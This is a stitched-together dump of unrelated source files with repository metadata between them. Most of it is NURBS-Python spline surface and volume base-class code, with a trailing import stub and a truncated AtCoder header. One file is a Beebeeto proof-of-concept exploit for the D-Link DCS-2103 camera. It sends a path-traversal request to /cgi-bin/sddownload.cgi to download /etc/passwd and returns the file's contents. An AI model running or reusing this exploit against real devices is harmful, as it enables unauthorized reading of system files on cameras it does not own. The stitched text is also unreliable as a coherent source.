self._vis_component.add(ptsarr=self.evalpts, name=self.name, color=evalcolor, plot_type='evalpts') # Add surface points as quads if self._vis_component.mconf['evalpts'] == 'quads': evalpts_quads = utilities.make_quad(self.evalpts, self.sample_size_u, self.sample_size_v) self._vis_component.add(ptsarr=evalpts_quads, name=self.name, color=evalcolor, plot_type='evalpts') # Add surface points as vertices and triangles if self._vis_component.mconf['evalpts'] == 'triangles': self.tessellate() self._vis_component.add(ptsarr=[self.tessellator.vertices, self.tessellator.faces], name=self.name, color=evalcolor, plot_type='evalpts') # Visualize the trim curve for idx, trim in enumerate(self._trims): self._vis_component.add(ptsarr=self.evaluate_list(trim.evalpts), name="Trim Curve " + str(idx + 1), color=trimcolor, plot_type='trimcurve') # Bounding box self._vis_component.add(ptsarr=self.bbox, name="Bounding Box", color=bboxcolor, plot_type='bbox') # User-defined plots if extra_plots is not None: for ep in extra_plots: self._vis_component.add(ptsarr=ep['points'], name=ep['name'], color=(ep['color'], ep['size']), plot_type='extras') # Data requested by the visualization module if self._vis_component.mconf['others']: vis_other = self._vis_component.mconf['others'].split(",") for vo in vis_other: vo_clean = vo.strip() # Send center point of the parametric space to the visualization module if vo_clean == "midpt": midprm_u = (max(self.knotvector_u) + min(self.knotvector_u)) / 2.0 midprm_v = (max(self.knotvector_v) + min(self.knotvector_v)) / 2.0 midpt = self.evaluate_single((midprm_u, midprm_v)) self._vis_component.add(ptsarr=[midpt], plot_type=vo_clean) # Display the figure if animate_plot: self._vis_component.animate(fig_save_as=filename, display_plot=plot_visible, colormap=surf_cmap) else: self._vis_component.render(fig_save_as=filename, display_plot=plot_visible, colormap=surf_cmap) def tessellate(self, **kwargs): """ Tessellates the surface. Keyword arguments are directly passed to the tessellation component. """ # No need to re-tessellate if we have already tessellated the surface if self._tsl_component.is_tessellated(): return # Remove duplicate elements from the kwargs dictionary kwlist = ["size_u", "size_v", "trims"] for kw in kwlist: if kw in kwargs: kwargs.pop(kw) # Call tessellation component for vertex and triangle generation self._tsl_component.tessellate(self.evalpts, size_u=self.sample_size_u, size_v=self.sample_size_v, trims=self.trims, **kwargs) # Re-evaluate vertex coordinates for idx in range(len(self._tsl_component.vertices)): self._tsl_component.vertices[idx].data = self.evaluate_single(self._tsl_component.vertices[idx].uv) def reset(self, **kwargs): """ Resets control points and/or evaluated points. Keyword Arguments: * ``evalpts``: if True, then resets evaluated points * ``ctrlpts`` if True, then resets control points """ reset_ctrlpts = kwargs.get('ctrlpts', False) reset_evalpts = kwargs.get('evalpts', False) if reset_ctrlpts: self._control_points = self._init_array() self._control_points_size[0] = 0 self._control_points_size[1] = 0 self._bounding_box = self._init_array() if reset_evalpts: self._eval_points = self._init_array() # Reset vertices and triangles self._tsl_component.reset() # Checks whether the surface evaluation is possible or not def _check_variables(self): works = True param_list = [] if self.degree_u == 0: works = False param_list.append('degree_u') if self.degree_v == 0: works = False param_list.append('degree_v') if len(self._control_points) == 0: works = False param_list.append('ctrlpts') if len(self.knotvector_u) == 0: works = False param_list.append('knotvector_u') if len(self.knotvector_v) == 0: works = False param_list.append('knotvector_v') if not works: raise ValueError("Please set the following variables before evaluation: " + ",".join(param_list)) @abc.abstractmethod def evaluate(self, **kwargs): """ Evaluates the parametric surface. .. note:: This is an abstract method and it must be implemented in the subclass. """ # Check all parameters are set before the evaluation self._check_variables() @abc.abstractmethod def evaluate_single(self, param): """ Evaluates the parametric surface at the given (u, v) parameter. .. note:: This is an abstract method and it must be implemented in the subclass. :param param: parameter (u, v) """ # Check all variables are set before the evaluation self._check_variables() if isinstance(param, (int, float)): param = [float(param) for _ in range(self.pdimension)] # Check parameters if self._kv_normalize: if not utilities.check_params(param): raise GeomdlException("Parameters should be between 0 and 1") @abc.abstractmethod def evaluate_list(self, param_list): """ Evaluates the parametric surface for an input range of (u, v) parameters. .. note:: This is an abstract method and it must be implemented in the subclass. :param param_list: array of parameters (u, v) """ # Check all parameters are set before the evaluation self._check_variables() @abc.abstractmethod def derivatives(self, u, v, order, **kwargs): """ Evaluates the derivatives of the parametric surface at parameter (u, v). .. note:: This is an abstract method and it must be implemented in the subclass. :param u: parameter on the u-direction :type u: float :param v: parameter on the v-direction :type v: float :param order: derivative order :type order: int """ # Check all variables are set before the evaluation self._check_variables() # Check parameters if self._kv_normalize: if not utilities.check_params([u, v]): raise GeomdlException("Parameters should be between 0 and 1") @six.add_metaclass(abc.ABCMeta) class Volume(SplineGeometry): """ Abstract base class for defining spline volumes. Volume ABC is inherited from abc.ABCMeta class which is included in Python standard library by default. Due to differences between Python 2 and 3 on defining a metaclass, the compatibility module ``six`` is employed. Using ``six`` to set metaclass allows users to use the abstract classes in a correct way. The abstract base classes in this module are implemented using a feature called Python Properties. This feature allows users to use some of the functions as if they are class fields. You can also consider properties as a pythonic way to set getters and setters. You will see "getter" and "setter" descriptions on the documentation of these properties. The Volume ABC allows users to set the *FindSpan* function to be used in evaluations with ``find_span_func`` keyword as an input to the class constructor. NURBS-Python includes a binary and a linear search variation of the FindSpan function in the ``helpers`` module. You may also implement and use your own *FindSpan* function. Please see the ``helpers`` module for details. Code segment below illustrates a possible implementation of Volume abstract base class: .. code-block:: python :linenos: from geomdl import abstract class MyVolumeClass(abstract.Volume): def __init__(self, **kwargs): super(MyVolumeClass, self).__init__(**kwargs) # Add your constructor code here def evaluate(self, **kwargs): # Implement this function pass def evaluate_single(self, uvw): # Implement this function pass def evaluate_list(self, uvw_list): # Implement this function pass The properties and functions defined in the abstract base class will be automatically available in the subclasses. **Keyword Arguments:** * ``precision``: number of decimal places to round to. *Default: 18* * ``normalize_kv``: if True, knot vector(s) will be normalized to [0,1] domain. *Default: True* * ``find_span_func``: default knot span finding algorithm. *Default:* :func:`.helpers.find_span_linear` """ def __init__(self, **kwargs): self._pdim = 3 if not hasattr(self, '_pdim') else self._pdim # number of parametric directions self._dinit = 0.1 if not hasattr(self, '_dinit') else self._dinit # evaluation delta init value self._array_type = list if not hasattr(self, '_array_type') else self._array_type super(Volume, self).__init__(**kwargs) self._name = "Volume" # descriptor field @property def order_u(self): """ Order for the u-direction. Defined as ``order = degree + 1`` Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets the surface order for u-direction :setter: Sets the surface order for u-direction :type: int """ return self.degree_u + 1 @order_u.setter def order_u(self, value): self.degree_u = value - 1 @property def order_v(self): """ Order for the v-direction. Defined as ``order = degree + 1`` Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets the surface order for v-direction :setter: Sets the surface order for v-direction :type: int """ return self.degree_v + 1 @order_v.setter def order_v(self, value): self.degree_v = value - 1 @property def order_w(self): """ Order for the w-direction. Defined as ``order = degree + 1`` Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets the surface order for v-direction :setter: Sets the surface order for v-direction :type: int """ return self.degree_w + 1 @order_w.setter def order_w(self, value): self.degree_w = value - 1 @property def degree(self): """ Degree for u-, v- and w-directions :getter: Gets the degree :setter: Sets the degree :type: list """ return self._degree @degree.setter def degree(self, value): if not isinstance(value, (list, tuple)): raise ValueError("Please input a list with a length of " + str(self.pdimension)) self.degree_u = value[0] self.degree_v = value[1] self.degree_w = value[2] @property def degree_u(self): """ Degree for the u-direction. Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets degree for the u-direction :setter: Sets degree for the u-direction :type: int """ return self._degree[0] @degree_u.setter def degree_u(self, value): val = int(value) if val <= 0: raise ValueError("Degree cannot be less than zero") # Clean up the surface points self.reset(evalpts=True) # Set degree u self._degree[0] = int(value) @property def degree_v(self): """ Degree for the v-direction. Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets degree for the v-direction :setter: Sets degree for the v-direction :type: int """ return self._degree[1] @degree_v.setter def degree_v(self, value): val = int(value) if val <= 0: raise ValueError("Degree cannot be less than zero") # Clean up the surface points self.reset(evalpts=True) # Set degree v self._degree[1] = val @property def degree_w(self): """ Degree for the w-direction. Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets degree for the w-direction :setter: Sets degree for the w-direction :type: int """ return self._degree[2] @degree_w.setter def degree_w(self, value): val = int(value) if val <= 0: raise ValueError("Degree cannot be less than zero") # Clean up the surface points self.reset(evalpts=True) # Set degree v self._degree[2] = val @property def knotvector(self): """ Knot vector for u-, v- and w-directions :getter: Gets the knot vector :setter: Sets the knot vector :type: list """ return self._knot_vector @knotvector.setter def knotvector(self, value): if not isinstance(value, (list, tuple)): raise ValueError("Please input a list with a length of " + str(self.pdimension)) self.knotvector_u = value[0] self.knotvector_v = value[1] self.knotvector_w = value[2] @property def knotvector_u(self): """ Knot vector for the u-direction. The knot vector will be normalized to [0, 1] domain if the class is initialized with ``normalize_kv=True`` argument. Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets knot vector for the u-direction :setter: Sets knot vector for the u-direction :type: list """ return self._knot_vector[0] @knotvector_u.setter def knotvector_u(self, value): if self.degree_u == 0 or self.ctrlpts_size_u == 0: raise ValueError("Set degree and control points first on the u-direction") # Check knot vector validity if not utilities.check_knot_vector(self.degree_u, value, self.ctrlpts_size_u): raise ValueError("Input is not a valid knot vector on the u-direction") # Clean up the surface points self.reset(evalpts=True) # Set knot vector self._knot_vector[0] = utilities.normalize_knot_vector(value, decimals=self._precision) \ if self._kv_normalize else value @property def knotvector_v(self): """ Knot vector for the v-direction. The knot vector will be normalized to [0, 1] domain if the class is initialized with ``normalize_kv=True`` argument. Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets knot vector for the v-direction :setter: Sets knot vector for the v-direction :type: list """ return self._knot_vector[1] @knotvector_v.setter def knotvector_v(self, value): if self.degree_v == 0 or self.ctrlpts_size_v == 0: raise ValueError("Set degree and control points first on the v-direction") # Check knot vector validity if not utilities.check_knot_vector(self.degree_v, value, self.ctrlpts_size_v): raise ValueError("Input is not a valid knot vector on the v-direction") # Clean up the surface points self.reset(evalpts=True) # Set knot vector self._knot_vector[1] = utilities.normalize_knot_vector(value, decimals=self._precision) \ if self._kv_normalize else value @property def knotvector_w(self): """ Knot vector for the w-direction. The knot vector will be normalized to [0, 1] domain if the class is initialized with ``normalize_kv=True`` argument. Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets knot vector for the w-direction :setter: Sets knot vector for the w-direction :type: list """ return self._knot_vector[2] @knotvector_w.setter def knotvector_w(self, value): if self.degree_w == 0 or self.ctrlpts_size_w == 0: raise ValueError("Set degree and control points first for the w-direction") # Check knot vector validity if not utilities.check_knot_vector(self.degree_w, value, self.ctrlpts_size_w): raise ValueError("Input is not a valid knot vector for the w-direction") # Clean up the surface points self.reset(evalpts=True) # Set knot vector self._knot_vector[2] = utilities.normalize_knot_vector(value, decimals=self._precision) \ if self._kv_normalize else value @property def ctrlpts(self): """ 1-dimensional array of control points. Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets the control points :setter: Sets the control points :type: list """ return self._control_points @ctrlpts.setter def ctrlpts(self, value): if self.ctrlpts_size_u <= 0 or self.ctrlpts_size_v <= 0 or self.ctrlpts_size_w <= 0: raise ValueError("Please set the number of control points on the u-, v- and w-directions") self.set_ctrlpts(value, self.ctrlpts_size_u, self.ctrlpts_size_v, self.ctrlpts_size_w) @property def ctrlpts_size_u(self): """ Number of control points for the u-direction. Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets number of control points for the u-direction :setter: Sets number of control points for the u-direction """ return self._control_points_size[0] @ctrlpts_size_u.setter def ctrlpts_size_u(self, value): if not isinstance(value, int): raise TypeError("Number of control points for the u-direction must be an integer number") if value <= 0: raise ValueError("Control points size cannot be less than and equal to zero") # Assume that user is doing this right self._control_points_size[0] = value @property def ctrlpts_size_v(self): """ Number of control points for the v-direction. Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets number of control points for the v-direction :setter: Sets number of control points for the v-direction """ return self._control_points_size[1] @ctrlpts_size_v.setter def ctrlpts_size_v(self, value): if not isinstance(value, int): raise TypeError("Number of control points for the v-direction must be an integer number") if value <= 0: raise ValueError("Control points size cannot be less than and equal to zero") # Assume that user is doing this right self._control_points_size[1] = value @property def ctrlpts_size_w(self): """ Number of control points for the w-direction. Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets number of control points for the w-direction :setter: Sets number of control points for the w-direction """ return self._control_points_size[2] @ctrlpts_size_w.setter def ctrlpts_size_w(self, value): if not isinstance(value, int): raise TypeError("Number of control points for the w-direction must be an integer number") if value <= 0: raise ValueError("Control points size cannot be less than and equal to zero") # Assume that user is doing this right self._control_points_size[2] = value @property def sample_size_u(self): """ Sample size for the u-direction. Sample size defines the number of evaluated points to generate. It also sets the ``delta_u`` property. Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets sample size for the u-direction :setter: Sets sample size for the u-direction :type: int """ return int(1.0 / self.delta_u) + 1 @sample_size_u.setter def sample_size_u(self, value): if not isinstance(value, int): raise ValueError("Sample size must be an integer value") if (self.knotvector_u is None or len(self.knotvector_u) == 0) or self.degree_u == 0: warnings.warn("Cannot determine 'delta_u' value. Please set knot vectors and degrees before sample size.") return # To make it operate like linspace, we have to know the starting and ending points. start_u = self.knotvector_u[self.degree_u] stop_u = self.knotvector_u[-(self.degree_u + 1)] # Set delta values self.delta_u = (stop_u - start_u) / float(value - 1) @property def sample_size_v(self): """ Sample size for the v-direction. Sample size defines the number of evaluated points to generate. It also sets the ``delta_v`` property. Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets sample size for the v-direction :setter: Sets sample size for the v-direction :type: int """ return int(1.0 / self.delta_v) + 1 @sample_size_v.setter def sample_size_v(self, value): if not isinstance(value, int): raise ValueError("Sample size must be an integer value") if (self.knotvector_v is None or len(self.knotvector_v) == 0) or self.degree_v == 0: warnings.warn("Cannot determine 'delta_v' value. Please set knot vectors and degrees before sample size.") return # To make it operate like linspace, we have to know the starting and ending points. start_v = self.knotvector_v[self.degree_v] stop_v = self.knotvector_v[-(self.degree_v + 1)] # Set delta values self.delta_v = (stop_v - start_v) / float(value - 1) @property def sample_size_w(self): """ Sample size for the w-direction. Sample size defines the number of evaluated points to generate. It also sets the ``delta_w`` property. Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets sample size for the w-direction :setter: Sets sample size for the w-direction :type: int """ return int(1.0 / self.delta_w) + 1 @sample_size_w.setter def sample_size_w(self, value): if not isinstance(value, int): raise ValueError("Sample size must be an integer value") if (self.knotvector_w is None or len(self.knotvector_w) == 0) or self.degree_w == 0: warnings.warn("Cannot determine 'delta_w' value. Please set knot vectors and degrees before sample size.") return # To make it operate like linspace, we have to know the starting and ending points. start_w = self.knotvector_w[self.degree_w] stop_w = self.knotvector_w[-(self.degree_w + 1)] # Set delta values self.delta_w = (stop_w - start_w) / float(value - 1) @property def sample_size(self): """ Sample size for both u- and v-directions. Sample size defines the number of surface points to generate. It also sets the ``delta`` property. The following figure illustrates the working principles of sample size property: .. math:: \\underbrace {\\left[ {{u_{start}}, \\ldots ,{u_{end}}} \\right]}_{{n_{sample}}} Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets sample size as a tuple of values corresponding to u-, v- and w-directions :setter: Sets sample size value for both u-, v- and w-directions :type: int """ sample_size_u = int(1.0 / self.delta_u) + 1 sample_size_v = int(1.0 / self.delta_v) + 1 sample_size_w = int(1.0 / self.delta_w) + 1 return sample_size_u, sample_size_v, sample_size_w @sample_size.setter def sample_size(self, value): if (self.knotvector_u is None or len(self.knotvector_u) == 0) or self.degree_u == 0 or \ (self.knotvector_v is None or len(self.knotvector_v) == 0 or self.degree_v == 0) or \ (self.knotvector_w is None or len(self.knotvector_w) == 0 or self.degree_w == 0): warnings.warn("Cannot determine 'delta' value. Please set knot vectors and degrees before sample size.") return # To make it operate like linspace, we have to know the starting and ending points. start_u = self.knotvector_u[self.degree_u] stop_u = self.knotvector_u[-(self.degree_u + 1)] start_v = self.knotvector_v[self.degree_v] stop_v = self.knotvector_v[-(self.degree_v + 1)] start_w = self.knotvector_w[self.degree_w] stop_w = self.knotvector_w[-(self.degree_w + 1)] # Set delta values self.delta_u = (stop_u - start_u) / float(value - 1) self.delta_v = (stop_v - start_v) / float(value - 1) self.delta_w = (stop_w - start_w) / float(value - 1) @property def delta_u(self): """ Evaluation delta for the u-direction. Evaluation delta corresponds to the *step size* while ``evaluate()`` function iterates on the knot vector to generate surface points. Decreasing step size results in generation of more surface points. Therefore; smaller the delta value, smoother the surface. Please note that ``delta_u`` and ``sample_size_u`` properties correspond to the same variable with different descriptions. Therefore, setting ``delta_u`` will also set ``sample_size_u``. Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets evaluation delta for the u-direction :setter: Sets evaluation delta for the u-direction :type: float """ return self._delta[0] @delta_u.setter def delta_u(self, value): # Delta value should be between 0 and 1 if float(value) <= 0 or float(value) >= 1: raise ValueError("Evaluation delta (u-direction) must be between 0.0 and 1.0") # Clean up evaluated points self.reset(evalpts=True) # Set new delta value self._delta[0] = float(value) @property def delta_v(self): """ Evaluation delta for the v-direction. Evaluation delta corresponds to the *step size* while ``evaluate()`` function iterates on the knot vector to generate surface points. Decreasing step size results in generation of more surface points. Therefore; smaller the delta value, smoother the surface. Please note that ``delta_v`` and ``sample_size_v`` properties correspond to the same variable with different descriptions. Therefore, setting ``delta_v`` will also set ``sample_size_v``. Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets evaluation delta for the v-direction :setter: Sets evaluation delta for the v-direction :type: float """ return self._delta[1] @delta_v.setter def delta_v(self, value): # Delta value should be between 0 and 1 if float(value) <= 0 or float(value) >= 1: raise ValueError("Evaluation delta (v-direction) should be between 0.0 and 1.0") # Clean up evaluated points self.reset(evalpts=True) # Set new delta value self._delta[1] = float(value) @property def delta_w(self): """ Evaluation delta for the w-direction. Evaluation delta corresponds to the *step size* while ``evaluate()`` function iterates on the knot vector to generate surface points. Decreasing step size results in generation of more surface points. Therefore; smaller the delta value, smoother the surface. Please note that ``delta_w`` and ``sample_size_w`` properties correspond to the same variable with different descriptions. Therefore, setting ``delta_w`` will also set ``sample_size_w``. Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets evaluation delta for the w-direction :setter: Sets evaluation delta for the w-direction :type: float """ return self._delta[2] @delta_w.setter def delta_w(self, value): # Delta value should be between 0 and 1 if float(value) <= 0 or float(value) >= 1: raise ValueError("Evaluation delta (w-direction) should be between 0.0 and 1.0") # Clean up evaluated points self.reset(evalpts=True) # Set new delta value self._delta[2] = float(value) @property def delta(self): """ Evaluation delta for u-, v- and w-directions. Evaluation delta corresponds to the *step size* while ``evaluate()`` function iterates on the knot vector to generate surface points. Decreasing step size results in generation of more surface points. Therefore; smaller the delta value, smoother the surface. Please note that ``delta`` and ``sample_size`` properties correspond to the same variable with different descriptions. Therefore, setting ``delta`` will also set ``sample_size``. The following figure illustrates the working principles of the delta property: .. math:: \\left[{{u_{0}},{u_{start}} + \\delta ,({u_{start}} + \\delta ) + \\delta , \\ldots ,{u_{end}}} \\right] Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets evaluation delta as a tuple of values corresponding to u-, v- and w-directions :setter: Sets evaluation delta for u-, v- and w-directions :type: float """ return self.delta_u, self.delta_v, self.delta_w @delta.setter def delta(self, value): if isinstance(value, (int, float)): self.delta_u = value self.delta_v = value self.delta_w = value elif isinstance(value, (list, tuple)): if len(value) == 3: self.delta_u = value[0] self.delta_v = value[1] self.delta_w = value[2] else: raise ValueError("Surface requires 3 delta values") else: raise ValueError("Cannot set delta. Please input a numeric value or a list or tuple with 3 numeric values") @property def data(self): """ Returns a dictionary containing all shape data. Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. """ return dict( rational=self.rational, dimension=self.dimension, degree=self._degree, knotvector=self._knot_vector, size=self._control_points_size, control_points=self._control_points ) def reset(self, **kwargs): """ Resets control points and/or evaluated points. Keyword Arguments: * ``evalpts``: if True, then resets evaluated points * ``ctrlpts`` if True, then resets control points """ reset_ctrlpts = kwargs.get('ctrlpts', False) reset_evalpts = kwargs.get('evalpts', False) if reset_ctrlpts: self._control_points = self._init_array() self._control_points_size = [0, 0, 0] self._bounding_box = self._init_array() if reset_evalpts: self._eval_points = self._init_array() def _check_variables(self): """ Checks whether the evaluation is possible or not. """ works = True param_list = [] if self.degree_u == 0: works = False param_list.append('degree_u') if self.degree_v == 0: works = False param_list.append('degree_v') if self.degree_w == 0: works = False param_list.append('degree_w') if self._control_points is None or len(self._control_points) == 0: works = False param_list.append('ctrlpts') if self.knotvector_u is None or len(self.knotvector_u) == 0: works = False param_list.append('knotvector_u') if self.knotvector_v is None or len(self.knotvector_v) == 0: works = False param_list.append('knotvector_v') if self.knotvector_w is None or len(self.knotvector_w) == 0: works = False param_list.append('knotvector_w') if not works: raise ValueError("Please set the following variables before evaluation: " + ",".join(param_list)) def set_ctrlpts(self, ctrlpts, *args, **kwargs): """ Sets the control points and checks if the data is consistent. This method is designed to provide a consistent way to set control points whether they are weighted or not. It directly sets the control points member of the class, and therefore it doesn't return any values. The input will be an array of coordinates. If you are working in the 3-dimensional space, then your coordinates will be an array of 3 elements representing *(x, y, z)* coordinates. :param ctrlpts: input control points as a list of coordinates :type ctrlpts: list :param args: number of control points corresponding to each parametric dimension :type args: tuple[int, int, int] """ # Validate input for arg, degree in zip(args, self._degree): if degree <= 0: raise ValueError("Set the degree first") if arg < degree + 1: raise ValueError("Number of control points should be at least degree + 1") # Clean up the surface and control points self.reset(evalpts=True, ctrlpts=True) # Call parent function super(Volume, self).set_ctrlpts(ctrlpts, *args, **kwargs) def render(self, **kwargs): """ Renders the volume using the visualization component. The visualization component must be set using :py:attr:`~vis` property before calling this method. Keyword Arguments: * ``cpcolor``: sets the color of the control points * ``evalcolor``: sets the color of the volume * ``filename``: saves the plot with the input name * ``plot``: controls plot window visibility. *Default: True* * ``animate``: activates animation (if supported). *Default: False* * ``grid_size``: grid size for voxelization. *Default: (16, 16, 16)* * ``use_mp``: flag to activate multi-threaded voxelization. *Default: False* * ``num_procs``: number of concurrent processes for multi-threaded voxelization. *Default: 4* The ``plot`` argument is useful when you would like to work on the command line without any window context. If ``plot`` flag is False, this method saves the plot as an image file (.png file where possible) and disables plot window popping out. If you don't provide a file name, the name of the image file will be pulled from the configuration class. ``extras`` argument can be used to add extra line plots to the figure. This argument expects a list of dicts in the format described below: .. code-block:: python :linenos: [ dict( # line plot 1 points=[[1, 2, 3], [4, 5, 6]], # list of points name="My line Plot 1", # name displayed on the legend color="red", # color of the line plot size=6.5 # size of the line plot ), dict( # line plot 2 points=[[7, 8, 9], [10, 11, 12]], # list of points name="My line Plot 2", # name displayed on the legend color="navy", # color of the line plot size=12.5 # size of the line plot ) ] """ if not self._vis_component: warnings.warn("No visualization component has been set") return cpcolor = kwargs.get('cpcolor', 'blue') evalcolor = kwargs.get('evalcolor', 'green') bboxcolor = kwargs.get('bboxcolor', 'darkorange') filename = kwargs.get('filename', None) plot_visible = kwargs.get('plot', True) extra_plots = kwargs.get('extras', None) animate_plot = kwargs.get('animate', False) # Check all parameters are set self._check_variables() # Check if the volume has been evaluated if self._eval_points is None or len(self._eval_points) == 0: self.evaluate() # Clear the visualization component self._vis_component.clear() # Add control points if self._vis_component.mconf['ctrlpts'] == 'points': self._vis_component.add(ptsarr=self.ctrlpts, name="Control Points", color=cpcolor, plot_type='ctrlpts') # Add evaluated points if self._vis_component.mconf['evalpts'] == 'points': self._vis_component.add(ptsarr=self.evalpts, name=self.name, color=evalcolor, plot_type='evalpts') # Add evaluated points as voxels if self._vis_component.mconf['evalpts'] == 'voxels': grid, filled = voxelize.voxelize(self, **kwargs) polygrid = voxelize.convert_bb_to_faces(grid) self._vis_component.add(ptsarr=[polygrid, filled], name=self.name, color=evalcolor, plot_type='evalpts') # Bounding box self._vis_component.add(ptsarr=self.bbox, name="Bounding Box", color=bboxcolor, plot_type='bbox') # User-defined plots if extra_plots is not None: for ep in extra_plots: self._vis_component.add(ptsarr=ep['points'], name=ep['name'], color=(ep['color'], ep['size']), plot_type='extras') # Data requested by the visualization module if self._vis_component.mconf['others']: vis_other = self._vis_component.mconf['others'].split(",") for vo in vis_other: vo_clean = vo.strip() # Send center point of the parametric space to the visualization module if vo_clean == "midpt": midprm_u = (max(self.knotvector_u) + min(self.knotvector_u)) / 2.0 midprm_v = (max(self.knotvector_v) + min(self.knotvector_v)) / 2.0 midprm_w = (max(self.knotvector_w) + min(self.knotvector_w)) / 2.0 midpt = self.evaluate_single((midprm_u, midprm_v, midprm_w)) self._vis_component.add(ptsarr=[midpt], plot_type=vo_clean) # Display the figure if animate_plot: self._vis_component.animate(fig_save_as=filename, display_plot=plot_visible) else: self._vis_component.render(fig_save_as=filename, display_plot=plot_visible) @abc.abstractmethod def evaluate(self, **kwargs): """ Evaluates the parametric volume. .. note:: This is an abstract method and it must be implemented in the subclass. """ # Check all parameters are set before the evaluation self._check_variables() @abc.abstractmethod def evaluate_single(self, param): """ Evaluates the parametric surface at the given (u, v, w) parameter. .. note:: This is an abstract method and it must be implemented in the subclass. :param param: parameter pair (u, v, w) """ # Check all parameters are set before the evaluation self._check_variables() if isinstance(param, (int, float)): param = [float(param) for _ in range(self.pdimension)] # Check parameters if self._kv_normalize: if not utilities.check_params(param): raise GeomdlException("Parameters should be between 0 and 1") @abc.abstractmethod def evaluate_list(self, param_list): """ Evaluates the parametric volume for an input range of (u, v, w) parameter pairs. .. note:: This is an abstract method and it must be implemented in the subclass. :param param_list: array of parameter pairs (u, v, w) """ # Check all parameters are set before the evaluation self._check_variables()
720fea823a41bf05eb6a14e1f940971f38e10095
e77a3618d0afe63a2f00d87b61c3f19d3eba10d8
/plugins/beebeeto/poc_2014_0149.py
ff203f0727674fb7a8ebff1da4a637af1da4eb49
[]
no_license
Explorer1092/coco
b54e88a527b29209de7c636833ac5d102514291b
15c5aba0972ac68dc4c874ddacf5986af5ac2a64
refs/heads/master
2020-05-31T07:03:19.277209
2019-01-29T14:36:45
2019-01-29T14:36:45
null
0
0
null
null
null
null
UTF-8
Python
false
false
2,184
py
#!/usr/bin/env python # coding=utf-8 """ Site: http://www.beebeeto.com/ Framework: https://github.com/n0tr00t/Beebeeto-framework """ import urllib2 from baseframe import BaseFrame class MyPoc(BaseFrame): poc_info = { # poc相关信息 'poc': { 'id': 'poc-2014-0149', 'name': 'D-Link DCS-2103 /cgi-bin/sddownload.cgi 任意文件下载漏洞 Exploit', 'author': 'foundu', 'create_date': '2014-11-19', }, # 协议相关信息 'protocol': { 'name': 'http', 'port': [80], 'layer4_protocol': ['tcp'], }, # 漏洞相关信息 'vul': { 'app_name': 'D-Link', 'vul_version': 'DCS-2103', 'type': 'Arbitrary File Download', 'tag': ['D-Link漏洞', '任意文件下载漏洞', '/cgi-bin/sddownload.cgi', 'cgi'], 'desc': ''' Vulnerable is the next model: D-Link DCS-2103, Firmware 1.0.0. This model with other firmware versions also must be vulnerable. I found these vulnerabilities at 11.07.2014 and later informed D-Link. But they haven't answered. It looks like they are busy with fixing vulnerabilities in DAP-1360, which I wrote about earlier. ''', 'references': ['http://www.intelligentexploit.com/view-details.html?id=20197', ] }, } @classmethod def exploit(cls, args): payload = '/cgi-bin/sddownload.cgi?file=/../../etc/passwd' verify_url = args['options']['target'] + payload req = urllib2.Request(verify_url) if args['options']['verbose']: print '[*] Request URL: ' + verify_url content = urllib2.urlopen(req).read() if 'root:' in content and 'nobody:' in content: args['success'] = True args['poc_ret']['vul_url'] = verify_url args['poc_ret']['passwd'] = content return args verify = exploit if __name__ == '__main__': from pprint import pprint mp = MyPoc() pprint(mp.run())
eead8a129c8bd1f58b1499653bdbfad5e2d62157
526bf18a8695862067c817f432ab197ceb645f39
/scrappers/cars/getautofinance/hwy11ram/__init__.py
c8fffab15b7e28ff8f73e39f28b1f956fcff4a4e
[]
no_license
sintimaski/bfs-be
a7fd623911a2220face49a0ef84574f3fd7a09a8
964a9c7e9cc876aaf8b0723d6b3f26bd378c3721
refs/heads/master
2023-08-02T09:00:44.855055
2021-09-22T13:07:01
2021-09-22T13:07:01
339,531,610
0
0
null
null
null
null
UTF-8
Python
false
false
39
py
from .hwy11ram import Hwy11RamScrapper
21c0cebb2546807a8dd223104a08e5e29d58ec7c
62766deea531d0b89b86a53e6f51b94fd2a88f23
/AtCoder/ABC/131/c.py
fbe2beb18aab0fad58d1c7599493260ae7b68225
[ "MIT" ]
permissive
ttyskg/ProgrammingCompetition
53620b07317ae5cbd1ee06272e573e3682ac15f3
